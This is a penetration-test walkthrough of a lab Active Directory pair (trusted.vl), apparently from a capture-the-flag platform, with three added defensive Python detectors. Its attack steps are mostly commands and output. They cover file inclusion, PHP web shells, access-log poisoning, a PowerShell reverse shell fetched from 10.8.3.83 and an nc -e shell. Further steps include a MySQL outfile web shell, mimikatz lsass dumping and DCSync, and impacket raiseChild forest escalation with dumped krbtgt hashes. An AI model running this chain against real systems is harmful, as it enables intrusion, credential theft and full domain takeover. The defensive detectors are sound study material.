nmap scan
sudo nmap -Pn -v -A 10.10.234.117-118 -oA Scan/detail
Nmap scan report for 10.10.234.117
Host is up (0.27s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-10 14:43:24Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=trusteddc.trusted.vl
| Issuer: commonName=trusteddc.trusted.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-09T14:42:11
| Not valid after: 2025-02-08T14:42:11
| MD5: c37d:ef00:b155:3988:caea:d318:994a:0715
|_SHA-1: d43f:a2f1:ca21:44f2:8b6c:c74b:0c70:5b89:edec:f619
|_ssl-date: 2024-08-10T14:46:25+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: TRUSTED
| NetBIOS_Domain_Name: TRUSTED
| NetBIOS_Computer_Name: TRUSTEDDC
| DNS_Domain_Name: trusted.vl
| DNS_Computer_Name: trusteddc.trusted.vl
| DNS_Tree_Name: trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-08-10T14:46:08+00:00
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=8/10%OT=53%CT=1%CU=35210%PV=Y%DS=2%DC=T%G=Y%TM=66B7
OS:7D4B%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%
OS:TS=A)SEQ(SP=106%GCD=2%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=A)OPS(O1=M4CANW8ST1
OS:1%O2=M4CANW8ST11%O3=M4CANW8NNT11%O4=M4CANW8ST11%O5=M4CANW8ST11%O6=M4CAST
OS:11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)ECN(R=Y%DF=Y%T=80
OS:%W=FFFF%O=M4CANW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R
OS:=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=
OS:AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=
OS:80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=1
OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Uptime guess: 0.003 days (since Sat Aug 10 10:41:57 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: TRUSTEDDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-08-10T14:46:12
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
1 267.79 ms 10.8.0.1
2 267.98 ms 10.10.234.117
Nmap scan report for 10.10.234.118
Host is up (0.27s latency).
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.234.118/dashboard/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-10 14:43:25Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
|_SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
| http-title: Welcome to XAMPP
|_Requested resource was https://10.10.234.118/dashboard/
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3306/tcp open mysql MySQL 5.5.5-10.4.24-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.24-MariaDB
| Thread ID: 9
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, SupportsTransactions, LongColumnFlag, ODBCClient, FoundRows, InteractiveClient, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, IgnoreSigpipes, SupportsCompression, ConnectWithDatabase, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: 0)yLM|I7ui/LojJnmZY2
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=labdc.lab.trusted.vl
| Issuer: commonName=labdc.lab.trusted.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-09T14:42:14
| Not valid after: 2025-02-08T14:42:14
| MD5: 0ea5:c90c:7c2a:5921:a4ca:7938:3685:c9b6
|_SHA-1: ba28:6ebf:3391:9f4a:7130:2068:dde5:9ce0:8cf8:6005
| rdp-ntlm-info:
| Target_Name: LAB
| NetBIOS_Domain_Name: LAB
| NetBIOS_Computer_Name: LABDC
| DNS_Domain_Name: lab.trusted.vl
| DNS_Computer_Name: labdc.lab.trusted.vl
| DNS_Tree_Name: trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-08-10T14:46:09+00:00
|_ssl-date: 2024-08-10T14:46:26+00:00; +1s from scanner time.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=8/10%OT=53%CT=1%CU=41084%PV=Y%DS=2%DC=T%G=Y%TM=66B7
OS:7D4B%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%
OS:TS=A)SEQ(SP=104%GCD=2%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=A)OPS(O1=M4CANW8ST1
OS:1%O2=M4CANW8ST11%O3=M4CANW8NNT11%O4=M4CANW8ST11%O5=M4CANW8ST11%O6=M4CAST
OS:11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)ECN(R=Y%DF=Y%T=80
OS:%W=FFFF%O=M4CANW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R
OS:=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=
OS:AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=
OS:80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=1
OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Uptime guess: 0.003 days (since Sat Aug 10 10:42:00 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: LABDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-08-10T14:46:17
|_ start_date: N/A
TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 10.10.234.117
2 268.09 ms 10.10.234.118
NSE: Script Post-scanning.
Initiating NSE at 10:46
Completed NSE at 10:46, 0.00s elapsed
Initiating NSE at 10:46
Completed NSE at 10:46, 0.00s elapsed
Initiating NSE at 10:46
Completed NSE at 10:46, 0.00s elapsed
Post-scan script results:
| clock-skew:
| 0s:
| 10.10.234.117
|_ 10.10.234.118
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 213.00 seconds
Two domain controller targets. 10.10.234.117 is the parent domain and 10.10.234.118 is the child domain. The IPs may change partway through because the machines were reset.
hosts
10.10.234.117 trusteddc.trusted.vl trusted.vl
10.10.234.118 labdc.lab.trusted.vl lab.trusted.vl
http
Anonymous enumeration failed.
10.10.234.118 has port 80 open.
dirsearch -u http://10.10.234.118
...
[10:54:06] 301 - 342B - /dashboard -> http://10.10.234.118/dashboard/
[10:54:06] 200 - 7KB - /dashboard/
[10:54:06] 200 - 6KB - /dashboard/howto.html
[10:54:07] 200 - 31KB - /dashboard/faq.html
[10:54:07] 200 - 77KB - /dashboard/phpinfo.php
[10:54:08] 301 - 336B - /dev -> http://10.10.234.118/dev/
[10:54:09] 200 - 2KB - /dev/
[10:54:14] 200 - 30KB - /favicon.ico
...
[10:55:12] 200 - 779B - /Webalizer/
[10:55:15] 200 - 771B - /xampp/
Found the dev directory.
Visiting http://10.10.234.118/dev and clicking the link in the top-right corner redirects to http://10.10.234.118/dev/index.html?view=about.html.
There is a file inclusion; verified successfully.
curl http://10.10.234.118/dev/index.html?view=/windows/win.ini | sed -n '/<p>/,/\/p>/p'
The target also exposes a phpinfo page; it shows allow_url_include = Off, so remote inclusion is not supported.

Because of a Windows characteristic, however, including a UNC path can be attempted in this situation.
curl 'http://10.10.234.118/dev/index.html?view=\\10.8.3.83\share'
webshell
- shell.php
<?php fputs(fopen('shell.php','w'),'<?php @eval($_REQUEST[cmd]);?>'); ?>
http://10.10.234.118/dev/index.html?view=\\10.8.3.83\share\shell.php
- system.php
<?php system($_REQUEST["x"]); ?>
10.10.234.118/dev/index.html?view=\\10.8.3.83\share\system.php&x=whoami
The UNC path cannot be included, probably because of a system policy setting.
filter
http://10.10.234.118/dev/index.html?view=php://filter/read=convert.base64-encode/resource= C:\xampp\htdocs\dev\index.html
The extra space in this URL caused it to fail.
session
Check the value of session.save_path in phpinfo:
C:\xampp\tmp

http://10.10.234.118/dev/index.html?view=C:\xampp\tmp\sess_oodcv4po02oodvqr65mhheokcv
Insufficient permissions, access denied

http://10.10.234.118/dev/index.html?view=C:\xampp\tmp\sess_q5u3hs587fjl52i7ngte64t4p7
file_get_contents
Failed to open stream: Invalid argument in
wfuzz
Fuzz with a wordlist.
wget https://github.com/carlospolop/Auto_Wordlists/raw/main/wordlists/file_inclusion_windows.txt
wfuzz -c -w ./file_inclusion_windows.txt -u 'http://10.10.234.118/dev/index.html?view=FUZZ' --hw 208 --hs 'Failed|Permission'
.htaccess
Fuzzing turned up the .htaccess file; it turns out this file makes the .htm and .html extensions execute as PHP.
http://10.10.234.118/dev/index.html?view=.htaccess
AddType application/x-httpd-php .htm .html
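The AddType line above is the kind of handler override a configuration review should catch. As an added example (not code from the writeup or from XAMPP), the following Python reviewer scans Apache configuration text and reports every extension other than .php that an AddType/AddHandler line routes to PHP, plus any SetHandler-to-PHP inside a Files or FilesMatch block. The sample configuration is constructed to resemble the fuzzed .htaccess.

```python
"""Review Apache configuration text for directives that make extensions other than
.php execute as PHP, like the AddType line fuzzed out of .htaccess in this writeup.
Added example, not from the original page; the sample config is constructed."""
import re
import shlex

# Handler / MIME names that route a file to the PHP engine (mod_php or php-fpm via proxy).
PHP_HANDLER = re.compile(r'(x-httpd-php|php\d*-script|php-fpm)', re.I)
FILES_OPEN = re.compile(r'^<(Files|FilesMatch)\s+"?([^">]+?)"?\s*>$', re.I)
FILES_CLOSE = re.compile(r'^</(Files|FilesMatch)>$', re.I)
EXPECTED_EXTENSIONS = {'.php'}   # the only extension PHP is meant to execute


def _tokens(line):
    """Split a directive line like a shell would; fall back on unbalanced quotes."""
    try:
        return shlex.split(line)
    except ValueError:
        return line.split()


def php_extension_overrides(config_text, expected=EXPECTED_EXTENSIONS):
    """Return [(line_no, directive, extension_or_pattern)] for every mapping of a
    non-expected extension (AddType/AddHandler) or a <Files*> pattern (SetHandler) to PHP."""
    findings = []
    files_pattern = None          # pattern of the <Files*> block we are currently inside
    for no, raw in enumerate(config_text.splitlines(), 1):
        line = raw.split('#', 1)[0].strip()     # drop comments
        if not line:
            continue
        m = FILES_OPEN.match(line)
        if m:
            files_pattern = m.group(2)
            continue
        if FILES_CLOSE.match(line):
            files_pattern = None
            continue
        parts = _tokens(line)
        if len(parts) < 2:
            continue
        directive = parts[0].lower()
        if directive in ('addtype', 'addhandler') and len(parts) >= 3 and PHP_HANDLER.search(parts[1]):
            for ext in parts[2:]:
                ext = (ext if ext.startswith('.') else '.' + ext).lower()
                if ext not in expected:
                    findings.append((no, parts[0], ext))
        elif directive == 'sethandler' and PHP_HANDLER.search(parts[1]) and files_pattern is not None:
            findings.append((no, parts[0], files_pattern))
    return findings


# Constructed sample modelled on the .htaccess found in the writeup (not the real file).
SAMPLE_CONFIG = """\
# constructed sample
AddType application/x-httpd-php .htm .html
AddHandler application/x-httpd-php .php
<FilesMatch "\\.txt$">
    SetHandler application/x-httpd-php
</FilesMatch>
"""

if __name__ == '__main__':
    for line_no, directive, target in php_extension_overrides(SAMPLE_CONFIG):
        print(f'line {line_no}: {directive} routes {target!r} to PHP')
```

Run it against every .htaccess under the document root as well as httpd.conf; AllowOverride settings decide whether a per-directory .htaccess can add such a mapping at all, so a finding in .htaccess usually also means AllowOverride is broader than it needs to be.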
log
Fuzzing turned up the XAMPP log location.
http://10.10.234.118/dev/index.html?view=c:/xampp/apache/logs/access.log
curl -vvv -s "10.10.234.118/" -A "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);}elseif (isset(\$_REQUEST['x'])){eval(\$_REQUEST['x']);} ?>"
Command executed successfully:
http://10.10.234.118/dev/index.html?view=c:/xampp/apache/logs/access.log&cmd=whoami
nt authority\system
nc reverse shell failed:
http://10.10.234.118/dev/index.html?view=c:/xampp/apache/logs/access.log&cmd=\\10.8.3.83\share\nc.exe%20-e%20cmd.exe%2010.8.3.83%201234
Switch to nishang:
cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 s
echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.8.3.83 -Port 1234'>>s
echo -n 'iex(iwr -useb 10.8.3.83/s)' | iconv -t utf-16le | base64
aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgADEAMAAuADgALgAzAC4AOAAzAC8AcwApAA==
http://10.10.234.118/dev/index.html?view=c:/xampp/apache/logs/access.log&cmd=cmd.exe%20/c%20powershell%20-e%20aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgADEAMAAuADgALgAzAC4AOAAzAC8AcwApAA==
Reverse shell obtained.
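Every step of the inclusion chain above (win.ini read, php://filter, UNC include, User-Agent poisoning, including access.log back) leaves a distinctive line in the same Apache access log that was poisoned. As an added example, not code from the writeup, this Python scanner parses combined-format log lines and labels each request with the inclusion indicator it carries, including PHP tags planted in the User-Agent or Referer field. The log lines are constructed to mirror the requests described on this page; the IPs are the ones the page uses.

```python
"""Scan Apache combined-format access-log lines for local-file-inclusion probes and
log-poisoning attempts. Added example, not code from the writeup; the sample lines
are constructed to mirror the requests it describes."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicator patterns, generalised from the vectors tried against ?view= in this writeup.
STREAM_WRAPPER = re.compile(r'^(php|data|expect|phar|zip|glob|file)://', re.I)
UNC_PATH = re.compile(r'^(\\\\|//)[^\\/]+[\\/]')       # \\host\share or //host/share
DRIVE_PATH = re.compile(r'^[a-z]:[\\/]', re.I)        # C:\xampp\... or c:/xampp/...
TRAVERSAL = re.compile(r'\.\.[\\/]')
SENSITIVE_FILE = re.compile(r'(win\.ini|\.htaccess|sess_[0-9a-z]+|access\.log|error\.log)$', re.I)
PHP_TAG = re.compile(r'<\?(php|=)', re.I)             # PHP planted in a logged field


def parse_line(line):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_value(value):
    """Labels triggered by a single query-parameter value (after URL decoding)."""
    v = unquote(value)
    checks = [
        ('stream-wrapper', STREAM_WRAPPER), ('unc-path', UNC_PATH),
        ('absolute-path', DRIVE_PATH), ('traversal', TRAVERSAL),
        ('sensitive-file', SENSITIVE_FILE),
    ]
    return [label for label, rx in checks if rx.search(v)]


def scan_line(line):
    """Sorted list of indicator labels for one log line; empty when nothing matched."""
    rec = parse_line(line)
    if rec is None:
        return ['unparsable']
    found = set()
    for _, value in parse_qsl(urlsplit(rec['target']).query, keep_blank_values=True):
        found.update(classify_value(value))
    # Log poisoning writes PHP into a field the server logs; User-Agent and Referer are the usual ones.
    if PHP_TAG.search(unquote(rec['ua'])) or PHP_TAG.search(unquote(rec['referer'])):
        found.add('php-in-logged-field')
    return sorted(found)


def scan(lines):
    """Map line index -> labels for every suspicious line; benign lines are omitted."""
    report = {}
    for i, line in enumerate(lines):
        labels = scan_line(line)
        if labels:
            report[i] = labels
    return report


# Constructed sample log (not captured from the target), one line per technique.
SAMPLE_LOG = [
    '10.8.3.83 - - [10/Aug/2024:10:54:06 -0400] "GET /dev/index.html?view=about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.8.3.83 - - [10/Aug/2024:10:55:01 -0400] "GET /dev/index.html?view=/windows/win.ini HTTP/1.1" 200 611 "-" "curl/8.5.0"',
    '10.8.3.83 - - [10/Aug/2024:10:55:30 -0400] "GET /dev/index.html?view=php://filter/read=convert.base64-encode/resource=db.php HTTP/1.1" 200 900 "-" "curl/8.5.0"',
    '10.8.3.83 - - [10/Aug/2024:10:56:02 -0400] "GET /dev/index.html?view=%5C%5C10.8.3.83%5Cshare%5Cshell.php HTTP/1.1" 200 120 "-" "curl/8.5.0"',
    '10.8.3.83 - - [10/Aug/2024:10:57:10 -0400] "GET / HTTP/1.1" 200 7000 "-" "<?php system($_REQUEST[cmd]); ?>"',
    '10.8.3.83 - - [10/Aug/2024:10:57:45 -0400] "GET /dev/index.html?view=c:/xampp/apache/logs/access.log&cmd=whoami HTTP/1.1" 200 55000 "-" "curl/8.5.0"',
]

if __name__ == '__main__':
    for idx, labels in scan(SAMPLE_LOG).items():
        print(f'line {idx}: {", ".join(labels)}')
```

The `php-in-logged-field` label is the one to alert on immediately: on its own it is just a strange User-Agent, but followed by a request whose `view` parameter names access.log it is the complete poisoning sequence. Feeding the whole log through `scan` and correlating both labels from the same source IP is the practical detection.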
alternative way
http://10.10.168.230/dev/index.html?view=php://filter/read=convert.base64-encode/resource=C:\xampp\htdocs\dev\index.html
http://10.10.168.230/dev/index.html?view=php://filter/read=convert.base64-encode/resource=db.php
Decoding yields the MySQL root account password.
index.html actually contains a hint:
Eric please take a look at this if you have the time. I tried to implement some php code and set up the database connection but it doesn’t seem to work. Could you fix it please?
mysql webshell
mysql -h10.10.168.230 -uroot -p'SuperSecureMySQLPassw0rd1337.'
Write a webshell file:
SELECT "<?php system($_REQUEST[0]); ?>" into outfile '/xampp/htdocs/shell.php';
curl 'http://10.10.168.230/shell.php?0=whoami'
Also the SYSTEM user:
curl 'http://10.10.168.230/shell.php?0=powershell+-e+aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgADEAMAAuADgALgAzAC4AOAAzAC8AcwApAA=='
mysql databases
An alternative route not discovered earlier:
MariaDB [news]> select * from users;
+----+------------+--------------+-----------+----------------------------------+
| id | first_name | short_handle | last_name | password |
+----+------------+--------------+-----------+----------------------------------+
| 1 | Robert | rsmith | Smith | 7e7abb54bbef42f0fbfa3007b368def7 |
| 2 | Eric | ewalters | Walters | d6e81aeb4df9325b502a02f11043e0ad |
| 3 | Christine | cpowers | Powers | e3d3eb0f46fe5d75eed8d11d54045a60 |
+----+------------+--------------+-----------+----------------------------------+
3 rows in set (0.272 sec)
john --format=raw-md5 -w=/usr/share/wordlists/rockyou.txt mysql.hash
IHateEric2
rsmith
ewalters
cpowers
netexec smb 10.10.168.230 -u users -p IHateEric2 --continue-on-success
Obtained credentials for user rsmith, who has ForceChangePassword over ewalters; privilege escalation can then be done via DLL hijacking.
Intended path
enum
Enumerate domain users and groups.
get-aduser -filter * -server trusted.vl
get-adgroup -filter * -server trusted.vl -properties * | select samaccountname,description
Check AD user descriptions.
get-aduser -filter * -properties * | select samaccountname,description
get-adgroup 'Enterprise Admins' -server trusted.vl -properties *
Mimikatz
dump lsass
python -m http.server 8080 -d /usr/share/windows-resources/mimikatz/x64/
curl.exe -O http://10.8.3.83:8080/mimikatz.exe
.\mimikatz.exe "sekurlsa::logonpasswords" exit
.\mimikatz.exe "lsadump::dcsync /domain:lab.trusted.vl /user:lab\krbtgt" exit
c7a03c565c68c6fac5f8913fab576ebd
.\mimikatz.exe "lsadump::dcsync /domain:lab.trusted.vl /user:lab\administrator" exit
75878369ad33f35b7070ca854100bc07
Enumerate trust relationships
PS C:\programdata> Get-ADTrust -Filter *
Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=trusted.vl,CN=System,DC=lab,DC=trusted,DC=vl
ForestTransitive : False
IntraForest : True
IsTreeParent : False
IsTreeRoot : False
Name : trusted.vl
ObjectClass : trustedDomain
ObjectGUID : c8005918-3c50-4c33-bcaa-90c76f46561c
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=lab,DC=trusted,DC=vl
Target : trusted.vl
TGTDelegation : False
TrustAttributes : 32
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False
abuse
With the child-domain DC compromised and a bidirectional trust between parent and child domains, a golden ticket can be forged to impersonate an Enterprise Admin. RaiseChild automates the whole process.
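The reason the child-to-parent escalation works is visible in the Get-ADTrust output above: TrustAttributes is 32 (WITHIN_FOREST) and SIDFilteringQuarantined is False, so a SID history entry naming the parent domain's Enterprise Admins group is accepted by the parent's KDC. As an added example, not from the writeup or from any Microsoft tool, the following Python decodes the trustAttributes bitmask and states whether such an injected SID would be filtered on an intra-forest trust. The SIDs and the value 32 are the ones shown in the page's output; the flag values are the documented trustAttributes bits.

```python
"""Decode the TrustAttributes value reported by Get-ADTrust and reason about whether
SID history injected by a compromised child-domain DC would be filtered at the parent.
Added example, not from the writeup; the SIDs and the value 32 are copied from its output."""

# Bit values of the trustAttributes attribute (MS-ADTS 6.1.6.7.9).
TRUST_ATTRIBUTE_FLAGS = {
    0x0001: 'NON_TRANSITIVE',
    0x0002: 'UPLEVEL_ONLY',
    0x0004: 'QUARANTINED_DOMAIN',      # SID filtering enforced ("quarantined")
    0x0008: 'FOREST_TRANSITIVE',
    0x0010: 'CROSS_ORGANIZATION',
    0x0020: 'WITHIN_FOREST',           # parent/child or tree-root trust
    0x0040: 'TREAT_AS_EXTERNAL',
    0x0080: 'USES_RC4_ENCRYPTION',
    0x0200: 'CROSS_ORGANIZATION_NO_TGT_DELEGATION',
    0x0400: 'PIM_TRUST',
    0x0800: 'CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION',
}

# Well-known RIDs that matter when they appear in a forged SID history.
PRIVILEGED_RIDS = {
    500: 'Administrator', 512: 'Domain Admins', 516: 'Domain Controllers',
    518: 'Schema Admins', 519: 'Enterprise Admins', 520: 'Group Policy Creator Owners',
}


def decode_trust_attributes(value):
    """Return the flag names set in a trustAttributes integer, lowest bit first."""
    return [name for bit, name in sorted(TRUST_ATTRIBUTE_FLAGS.items()) if value & bit]


def split_sid(sid):
    """Split 'S-1-5-21-a-b-c-rid' into ('S-1-5-21-a-b-c', rid)."""
    domain, _, rid = sid.rpartition('-')
    return domain, int(rid)


def assess_intra_forest_trust(trust_attributes, forest_root_sid, extra_sids):
    """Return (filtered, reason). filtered is True when the extra SIDs would be stripped,
    False when the parent would honour them, None when the trust is not intra-forest
    (external and forest trusts follow different filtering rules not modelled here)."""
    flags = set(decode_trust_attributes(trust_attributes))
    if 'WITHIN_FOREST' not in flags:
        return None, 'not an intra-forest trust; filtering rules for external/forest trusts are not modelled'
    if 'QUARANTINED_DOMAIN' in flags:
        return True, 'quarantine (SID filtering) is set on this trust, so SIDs from other domains are stripped from the PAC'
    honoured = [PRIVILEGED_RIDS[rid] for dom, rid in map(split_sid, extra_sids)
                if dom == forest_root_sid and rid in PRIVILEGED_RIDS]
    if honoured:
        return False, 'intra-forest trust without quarantine: forest-root SIDs for %s would be honoured' % ', '.join(honoured)
    return False, 'intra-forest trust without quarantine; none of the supplied SIDs is a privileged forest-root SID'


# Values taken from the Get-ADTrust and Get-ADDomain output in this writeup.
LAB_TRUST_ATTRIBUTES = 32
TRUSTED_VL_SID = 'S-1-5-21-3576695518-347000760-3731839591'
ENTERPRISE_ADMINS_SID = TRUSTED_VL_SID + '-519'

if __name__ == '__main__':
    print(decode_trust_attributes(LAB_TRUST_ATTRIBUTES))
    print(assess_intra_forest_trust(LAB_TRUST_ATTRIBUTES, TRUSTED_VL_SID, [ENTERPRISE_ADMINS_SID]))
```

The practical takeaway for defenders is that the forest, not the domain, is the security boundary: a child DC compromise is a forest compromise, so child DCs need the same hardening and the same monitoring (DCSync replication by non-DC accounts, cross-domain tickets carrying RID 519 in SID history) as the forest root.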
RaiseChild
impacket-raiseChild "lab.trusted.vl"/"administrator" -hashes :75878369ad33f35b7070ca854100bc07 -debug
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Calling NRPC DsrGetDcNameEx()
[*] Raising child domain lab.trusted.vl
[*] Forest FQDN is: trusted.vl
[*] Raising lab.trusted.vl to trusted.vl
[+] Calling LSAT hLsarQueryInformationPolicy2()
[*] trusted.vl Enterprise Admin SID is: S-1-5-21-3576695518-347000760-3731839591-519
[*] Getting credentials for lab.trusted.vl
[+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=lab,DC=trusted,DC=vl
lab.trusted.vl/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c7a03c565c68c6fac5f8913fab576ebd:::
lab.trusted.vl/krbtgt:aes256-cts-hmac-sha1-96s:c930ddb15c3f84aafa01e816abc1112e38430b574ae3fcdd019e77bc906494aa
[+] Trying to connect to KDC at LAB.TRUSTED.VL:88
[+] Trying to connect to KDC at LAB.TRUSTED.VL:88
[+] VALIDATION_INFO before making it gold
....
[+] Getting TGS for SPN cifs/TRUSTEDDC
[+] Trying to connect to KDC at LAB.TRUSTED.VL:88
[+] Trying to connect to KDC at TRUSTED.VL:88
[*] Getting credentials for trusted.vl
[+] 10.10.234.117 is TRUSTEDDC.trusted.vl
[+] Trying to connect to KDC at LAB.TRUSTED.VL:88
[+] Trying to connect to KDC at TRUSTED.VL:88
[+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=trusted,DC=vl
trusted.vl/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d9436aebee2db5c6e4166d5e2472fa2d:::
trusted.vl/krbtgt:aes256-cts-hmac-sha1-96s:3e5bc8a7d01388cdaf4ab8541f4e360d4fd9089723cedfd08f8016b7900ba2bf
[*] Target User account name is Administrator
[+] 10.10.234.117 is TRUSTEDDC.trusted.vl
[+] Trying to connect to KDC at LAB.TRUSTED.VL:88
[+] Trying to connect to KDC at TRUSTED.VL:88
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=trusted,DC=vl
